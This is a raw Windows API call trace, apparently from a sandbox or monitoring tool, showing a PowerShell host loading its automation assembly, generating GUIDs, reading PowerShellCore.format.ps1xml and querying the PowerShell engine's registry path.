	[0806.955] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x43345faf, Data2=0x49c1, Data3=0x4708, Data4=([0]=0xa3, [1]=0x47, [2]=0xf0, [3]=0xf9, [4]=0xf5, [5]=0xba, [6]=0xd9, [7]=0xce))) returned 0x0
	[0806.956] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x96f5b6a9, Data2=0x8f65, Data3=0x4a48, Data4=([0]=0x81, [1]=0x36, [2]=0xb3, [3]=0x59, [4]=0xfe, [5]=0x6e, [6]=0xec, [7]=0xa8))) returned 0x0
	[0806.956] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0806.957] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0806.957] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0806.957] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0807.685] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x73693be2, Data2=0x2b83, Data3=0x433a, Data4=([0]=0x9e, [1]=0xb4, [2]=0x93, [3]=0xed, [4]=0x3a, [5]=0x11, [6]=0x79, [7]=0x71))) returned 0x0
	[0807.686] VirtualQuery (in: lpAddress=0x1ab440, lpBuffer=0x1ac300, dwLength=0x30 | out: lpBuffer=0x1ac300*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0807.687] VirtualQuery (in: lpAddress=0x1ab4d0, lpBuffer=0x1ac390, dwLength=0x30 | out: lpBuffer=0x1ac390*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0807.688] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x1cee113, Data2=0xae84, Data3=0x46ae, Data4=([0]=0xa3, [1]=0xf9, [2]=0x8c, [3]=0x2c, [4]=0x7a, [5]=0x74, [6]=0x1a, [7]=0x70))) returned 0x0
	[0808.327] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x3b5621b1, Data2=0x7b13, Data3=0x4455, Data4=([0]=0x9a, [1]=0xad, [2]=0xc3, [3]=0x45, [4]=0x39, [5]=0xb1, [6]=0x6e, [7]=0x3d))) returned 0x0
	[0808.328] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x48fccd97, Data2=0xe7e5, Data3=0x4d23, Data4=([0]=0x84, [1]=0xcb, [2]=0xd5, [3]=0xbc, [4]=0xb2, [5]=0x51, [6]=0xce, [7]=0x3b))) returned 0x0
	[0808.345] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x5a85ae89, Data2=0xace0, Data3=0x488b, Data4=([0]=0xb4, [1]=0xf, [2]=0xb7, [3]=0x8, [4]=0x35, [5]=0xfa, [6]=0x2a, [7]=0x0))) returned 0x0
	[0808.346] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x9fb3f806, Data2=0x4bdf, Data3=0x497c, Data4=([0]=0xb1, [1]=0xb7, [2]=0x35, [3]=0x94, [4]=0x1b, [5]=0x4e, [6]=0x20, [7]=0x24))) returned 0x0
	[0808.346] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0xb6bffe4f, Data2=0x26f0, Data3=0x4922, Data4=([0]=0x9c, [1]=0x1b, [2]=0x54, [3]=0xab, [4]=0xc2, [5]=0x36, [6]=0xb4, [7]=0x8d))) returned 0x0
	[0808.346] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0xb2eaaebf, Data2=0xc264, Data3=0x4319, Data4=([0]=0xa7, [1]=0xf1, [2]=0x59, [3]=0xb5, [4]=0x25, [5]=0x3c, [6]=0x78, [7]=0xd7))) returned 0x0
	[0808.346] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0xf22b6d5b, Data2=0x37d4, Data3=0x40ea, Data4=([0]=0x95, [1]=0xbf, [2]=0xe3, [3]=0x27, [4]=0xc1, [5]=0x5b, [6]=0xcf, [7]=0x8e))) returned 0x0
	[0808.347] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0xf048ba34, Data2=0x8ba3, Data3=0x45d3, Data4=([0]=0x80, [1]=0x33, [2]=0x13, [3]=0xca, [4]=0x2, [5]=0xb5, [6]=0xd0, [7]=0x81))) returned 0x0
	[0808.347] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x424359c0, Data2=0x5341, Data3=0x4c6b, Data4=([0]=0x94, [1]=0x40, [2]=0x83, [3]=0x53, [4]=0x4c, [5]=0x24, [6]=0xae, [7]=0xb))) returned 0x0
	[0808.347] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0xa6417164, Data2=0x25a0, Data3=0x4a1c, Data4=([0]=0xb3, [1]=0x1a, [2]=0x6b, [3]=0xe6, [4]=0x3d, [5]=0x31, [6]=0xe3, [7]=0x1f))) returned 0x0
	[0808.347] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0xfa1545a8, Data2=0x94fb, Data3=0x4984, Data4=([0]=0x92, [1]=0x6e, [2]=0x97, [3]=0x12, [4]=0x45, [5]=0x84, [6]=0x8f, [7]=0xd7))) returned 0x0
	[0808.352] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x9f628f34, Data2=0x6a8a, Data3=0x4907, Data4=([0]=0x92, [1]=0xf0, [2]=0x9b, [3]=0xae, [4]=0x6, [5]=0xe0, [6]=0xa6, [7]=0xcf))) returned 0x0
	[0809.272] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x39c640d0, Data2=0x9727, Data3=0x4b92, Data4=([0]=0xa3, [1]=0x2c, [2]=0x36, [3]=0xbd, [4]=0xa4, [5]=0x53, [6]=0xb0, [7]=0xdd))) returned 0x0
	[0809.284] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x327a9827, Data2=0x7684, Data3=0x4d3f, Data4=([0]=0x8f, [1]=0x6e, [2]=0x35, [3]=0x20, [4]=0x8f, [5]=0x4d, [6]=0x63, [7]=0xef))) returned 0x0
	[0809.285] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0xd306f1e2, Data2=0xe894, Data3=0x4ad8, Data4=([0]=0x8a, [1]=0x75, [2]=0xa1, [3]=0x8a, [4]=0x7, [5]=0xe2, [6]=0x16, [7]=0xf0))) returned 0x0
	[0809.286] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0xb5693204, Data2=0xbf5a, Data3=0x4042, Data4=([0]=0xa6, [1]=0x75, [2]=0x14, [3]=0xdc, [4]=0x7d, [5]=0x0, [6]=0xd, [7]=0x3d))) returned 0x0
	[0809.286] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0xb8265c2c, Data2=0x1d5c, Data3=0x407b, Data4=([0]=0xa6, [1]=0xb2, [2]=0x2f, [3]=0xb2, [4]=0x7a, [5]=0xde, [6]=0xb9, [7]=0xce))) returned 0x0
	[0809.287] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0xafc32bdc, Data2=0x9a3c, Data3=0x4c6a, Data4=([0]=0x8e, [1]=0xc2, [2]=0xc8, [3]=0x27, [4]=0x29, [5]=0x77, [6]=0xf5, [7]=0xb6))) returned 0x0
	[0809.288] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0xdcfb9043, Data2=0x23a5, Data3=0x4004, Data4=([0]=0xb9, [1]=0xcc, [2]=0xe2, [3]=0xba, [4]=0x97, [5]=0x16, [6]=0x10, [7]=0x4d))) returned 0x0
	[0809.289] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x531b708, Data2=0xe323, Data3=0x46e2, Data4=([0]=0xbd, [1]=0x15, [2]=0x8, [3]=0x89, [4]=0xdb, [5]=0x31, [6]=0xf, [7]=0x9))) returned 0x0
	[0809.289] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x734ea40a, Data2=0x3f, Data3=0x45f7, Data4=([0]=0x87, [1]=0xd7, [2]=0xd9, [3]=0xf5, [4]=0xb8, [5]=0xf1, [6]=0xcd, [7]=0x8))) returned 0x0
	[0809.290] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x304
	[0809.290] GetFileType (hFile=0x304) returned 0x1
	[0809.290] SetErrorMode (uMode=0x1) returned 0x1
	[0809.290] GetFileType (hFile=0x304) returned 0x1
	[0809.290] ReadFile (in: hFile=0x304, lpBuffer=0x36cafa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x36cafa0*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0809.292] ReadFile (in: hFile=0x304, lpBuffer=0x36cafa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x36cafa0*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0809.292] ReadFile (in: hFile=0x304, lpBuffer=0x36cafa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x36cafa0*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0809.296] ReadFile (in: hFile=0x304, lpBuffer=0x36cafa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x36cafa0*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0809.297] ReadFile (in: hFile=0x304, lpBuffer=0x36cafa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x36cafa0*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0809.298] ReadFile (in: hFile=0x304, lpBuffer=0x36cafa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x36cafa0*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0809.298] ReadFile (in: hFile=0x304, lpBuffer=0x36cafa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x36cafa0*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0809.298] ReadFile (in: hFile=0x304, lpBuffer=0x36cafa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x36cafa0*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0809.298] ReadFile (in: hFile=0x304, lpBuffer=0x36cafa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x36cafa0*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0809.300] ReadFile (in: hFile=0x304, lpBuffer=0x36cafa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x36cafa0*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0809.300] ReadFile (in: hFile=0x304, lpBuffer=0x36cafa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x36cafa0*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0809.301] ReadFile (in: hFile=0x304, lpBuffer=0x36cafa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x36cafa0*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0809.301] ReadFile (in: hFile=0x304, lpBuffer=0x36cafa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x36cafa0*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0809.301] ReadFile (in: hFile=0x304, lpBuffer=0x36cafa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x36cafa0*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0809.302] ReadFile (in: hFile=0x304, lpBuffer=0x36cafa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x36cafa0*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0810.158] ReadFile (in: hFile=0x304, lpBuffer=0x36cafa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x36cafa0*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0810.158] ReadFile (in: hFile=0x304, lpBuffer=0x36cafa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x36cafa0*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0810.162] ReadFile (in: hFile=0x304, lpBuffer=0x36cafa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x36cafa0*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0810.162] ReadFile (in: hFile=0x304, lpBuffer=0x36cafa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x36cafa0*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0810.162] ReadFile (in: hFile=0x304, lpBuffer=0x36cafa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x36cafa0*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0810.163] ReadFile (in: hFile=0x304, lpBuffer=0x36cafa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x36cafa0*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0810.163] ReadFile (in: hFile=0x304, lpBuffer=0x36cafa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x36cafa0*, lpNumberOfBytesRead=0x1ad178*=0xe67, lpOverlapped=0x0) returned 1
	[0810.163] ReadFile (in: hFile=0x304, lpBuffer=0x36ca56f, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x36ca56f*, lpNumberOfBytesRead=0x1ad178*=0x0, lpOverlapped=0x0) returned 1
	[0810.164] ReadFile (in: hFile=0x304, lpBuffer=0x36cafa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x36cafa0*, lpNumberOfBytesRead=0x1ad178*=0x0, lpOverlapped=0x0) returned 1
	[0810.164] CloseHandle (hObject=0x304) returned 1
	[0810.164] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0810.164] SetErrorMode (uMode=0x1) returned 0x1
	[0810.164] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad120 | out: lpFileInformation=0x1ad120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0810.164] SetErrorMode (uMode=0x1) returned 0x1
	[0810.164] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ace50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0810.165] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad208 | out: phkResult=0x1ad208*=0x304) returned 0x0
	[0810.165] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad18c, lpData=0x0, lpcbData=0x1ad188*=0x0 | out: lpType=0x1ad18c*=0x1, lpData=0x0, lpcbData=0x1ad188*=0x56) returned 0x0
	[0810.165] CoTaskMemAlloc (cb=0x5a) returned 0x3c6230
	[0810.165] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad15c, lpData=0x3c6230, lpcbData=0x1ad158*=0x56 | out: lpType=0x1ad15c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ad158*=0x56) returned 0x0
	[0810.165] CoTaskMemFree (pv=0x3c6230) 
	[0810.165] RegCloseKey (hKey=0x304) returned 0x0
	[0810.165] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ace50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0810.165] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0811.135] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0xfe92ae01, Data2=0x326f, Data3=0x4b82, Data4=([0]=0x8b, [1]=0xae, [2]=0x9c, [3]=0x29, [4]=0x9, [5]=0x7d, [6]=0x44, [7]=0xc1))) returned 0x0
	[0811.135] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x7eb19f5c, Data2=0xb4cb, Data3=0x4228, Data4=([0]=0xb5, [1]=0xf1, [2]=0x27, [3]=0x5a, [4]=0xa8, [5]=0xf6, [6]=0xdd, [7]=0xbd))) returned 0x0
	[0811.136] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0xe38830b5, Data2=0xd0e3, Data3=0x42f5, Data4=([0]=0x91, [1]=0x37, [2]=0x12, [3]=0xda, [4]=0xcb, [5]=0x6e, [6]=0x9c, [7]=0xe4))) returned 0x0
	[0811.137] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0xc369183d, Data2=0x438f, Data3=0x437f, Data4=([0]=0xb3, [1]=0x8f, [2]=0xbb, [3]=0x83, [4]=0xbe, [5]=0xf, [6]=0xa8, [7]=0xf4))) returned 0x0
	[0811.138] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x8733b0ee, Data2=0x43e8, Data3=0x4c4d, Data4=([0]=0x9a, [1]=0xba, [2]=0x96, [3]=0xfe, [4]=0xa5, [5]=0x43, [6]=0x92, [7]=0x5e))) returned 0x0
	[0811.138] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x407261e7, Data2=0x1322, Data3=0x4440, Data4=([0]=0xbf, [1]=0x2b, [2]=0x76, [3]=0x3a, [4]=0xd3, [5]=0xf9, [6]=0x48, [7]=0x75))) returned 0x0
	[0811.139] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x9ad37bc, Data2=0x466, Data3=0x4351, Data4=([0]=0xac, [1]=0x55, [2]=0xcd, [3]=0x63, [4]=0xf0, [5]=0x71, [6]=0xfe, [7]=0x6c))) returned 0x0
	[0811.140] VirtualQuery (in: lpAddress=0x1abde0, lpBuffer=0x1acca0, dwLength=0x30 | out: lpBuffer=0x1acca0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0811.141] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x686bc2b7, Data2=0x9a0c, Data3=0x4cd1, Data4=([0]=0x86, [1]=0x81, [2]=0x7, [3]=0x5d, [4]=0x80, [5]=0x24, [6]=0x51, [7]=0xbd))) returned 0x0
	[0811.142] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x937a2ea0, Data2=0xa26d, Data3=0x40a7, Data4=([0]=0x9d, [1]=0xa0, [2]=0xc4, [3]=0xad, [4]=0xea, [5]=0xa0, [6]=0x1d, [7]=0xa))) returned 0x0
	[0811.143] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x82586be, Data2=0x29bd, Data3=0x4d7a, Data4=([0]=0x80, [1]=0x97, [2]=0x44, [3]=0x4, [4]=0x21, [5]=0xc9, [6]=0x25, [7]=0x1))) returned 0x0
	[0811.143] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x3a9ec43a, Data2=0xc9bc, Data3=0x4f86, Data4=([0]=0x9b, [1]=0x61, [2]=0xb6, [3]=0xed, [4]=0xec, [5]=0x37, [6]=0x12, [7]=0xa4))) returned 0x0
	[0811.144] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x89150251, Data2=0xaaf3, Data3=0x4be2, Data4=([0]=0xba, [1]=0xf7, [2]=0xec, [3]=0xb7, [4]=0x20, [5]=0x6e, [6]=0x1f, [7]=0xb0))) returned 0x0
	[0811.145] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0xfc7dd0b2, Data2=0x9958, Data3=0x4335, Data4=([0]=0x98, [1]=0x97, [2]=0x65, [3]=0x24, [4]=0xe4, [5]=0x19, [6]=0xa9, [7]=0xc6))) returned 0x0
	[0811.145] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x9171327, Data2=0xbf77, Data3=0x4507, Data4=([0]=0xb0, [1]=0x37, [2]=0x64, [3]=0x8b, [4]=0x8c, [5]=0xbe, [6]=0x81, [7]=0x69))) returned 0x0
	[0811.145] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0xc92a0737, Data2=0x9f82, Data3=0x4df2, Data4=([0]=0x88, [1]=0x13, [2]=0xa3, [3]=0xd6, [4]=0xba, [5]=0x1e, [6]=0xcd, [7]=0xd6))) returned 0x0
	[0811.145] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x6e7ee249, Data2=0x7393, Data3=0x4e91, Data4=([0]=0x91, [1]=0xa1, [2]=0xa0, [3]=0x3c, [4]=0x20, [5]=0x53, [6]=0xb, [7]=0xdc))) returned 0x0
	[0811.146] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x6f6dbb06, Data2=0xc221, Data3=0x4546, Data4=([0]=0xad, [1]=0xd6, [2]=0xcf, [3]=0x89, [4]=0x8, [5]=0xd1, [6]=0x73, [7]=0xab))) returned 0x0
	[0811.146] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x34213e01, Data2=0xcf08, Data3=0x457d, Data4=([0]=0xbc, [1]=0x50, [2]=0x18, [3]=0x69, [4]=0xfe, [5]=0xcc, [6]=0x82, [7]=0xb2))) returned 0x0
	[0811.146] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x93316ad3, Data2=0x2aaa, Data3=0x4fe0, Data4=([0]=0x8f, [1]=0x88, [2]=0x65, [3]=0xba, [4]=0xc7, [5]=0xe2, [6]=0xab, [7]=0xb6))) returned 0x0
	[0811.148] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x36f31aee, Data2=0x661d, Data3=0x451f, Data4=([0]=0xb7, [1]=0xd9, [2]=0x9a, [3]=0x6e, [4]=0x9, [5]=0x3f, [6]=0xa2, [7]=0x59))) returned 0x0
	[0811.148] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x2acd4f27, Data2=0xabfe, Data3=0x4ad4, Data4=([0]=0xa8, [1]=0x39, [2]=0x3a, [3]=0xeb, [4]=0xe, [5]=0xd7, [6]=0xa, [7]=0x8b))) returned 0x0
	[0811.149] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x5a94ba03, Data2=0xd531, Data3=0x4665, Data4=([0]=0xbe, [1]=0xaa, [2]=0x9e, [3]=0x8a, [4]=0xe5, [5]=0xb5, [6]=0xd6, [7]=0x8a))) returned 0x0
	[0811.149] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x984eecbb, Data2=0x1fdd, Data3=0x4426, Data4=([0]=0x86, [1]=0xbd, [2]=0x14, [3]=0x58, [4]=0x1b, [5]=0x2, [6]=0xa3, [7]=0x36))) returned 0x0
	[0811.149] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x97bbe48e, Data2=0x90a8, Data3=0x4bcb, Data4=([0]=0xbe, [1]=0xa2, [2]=0x45, [3]=0xd3, [4]=0x2a, [5]=0x75, [6]=0xf2, [7]=0xd0))) returned 0x0
	[0811.150] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0xefdcc867, Data2=0x9aec, Data3=0x409b, Data4=([0]=0xb9, [1]=0x4c, [2]=0xee, [3]=0xed, [4]=0x17, [5]=0x9b, [6]=0x3d, [7]=0x5e))) returned 0x0
	[0811.150] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x537a4034, Data2=0x3e69, Data3=0x43bb, Data4=([0]=0x9a, [1]=0xf3, [2]=0x26, [3]=0x99, [4]=0xb4, [5]=0x61, [6]=0x3a, [7]=0x79))) returned 0x0
